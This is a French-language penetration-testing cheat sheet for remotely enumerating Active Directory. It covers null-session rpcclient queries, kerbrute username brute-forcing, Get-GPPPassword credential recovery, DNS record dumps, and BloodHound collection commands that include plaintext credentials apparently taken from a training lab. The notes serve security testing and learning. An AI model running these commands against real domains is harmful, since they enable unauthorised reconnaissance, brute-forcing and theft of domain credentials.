Enumération distante

Enum4Linux

enum4linux-ng <dc_ip>

Récupération des utilisateurs

rpcclient -U "" -N <dc_ip>
rpcclient $> enumdomusers
rpcclient $> enumdomgroups 
rpcclient $> enumprinters
rpcclient $> enumprivs
rpcclient $> querydispinfo
rpcclient $> lookupnames <USERNAME>

L’outil Kerbrutre peut être utilisé pour bruteforcer des utilisateurs ou mots de passe.

kerbrute userenum --dc $DC_IP -d $DOMAIN `fzf-wordlists`

La liste xato-net-10-million-usernames-dup.txt est intéressant pour ce type d’attaque. L’outil smartebrute semble très bien fonctionner lui aussi pour cette tache.

Récupération des GPP

Get-GPPPassword -debug -no-pass <DC>

Enumération des entrées DNS

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get dnsDump

adidnsdump -u "$DOMAIN"\\"$USER" -p "$PASSWORD"  "$DC_IP" -r

Les résultats sont ensuite stockés dans un fichier nommé “records.csv”.

Traitement de la sortie

Les données extraites par adidnsdump sont au format CSV, il est possible de traiter la sortie pour obtenir uniquement la liste des machines avec le nom de domaine complet:

cut -d "," -f 2 records.csv  | grep -v @ | sed 's/$/.$DOMAIN/

Bloodhound

nxc ldap 172.16.155.6  -u "jim" -p 'Castello1!' --bloodhound --collection All

bloodhound.py -c All -d blackfield.local -u 'support' -p '#00^BlackKnight' -dc dc01.blackfield.local -ns 10.10.10.192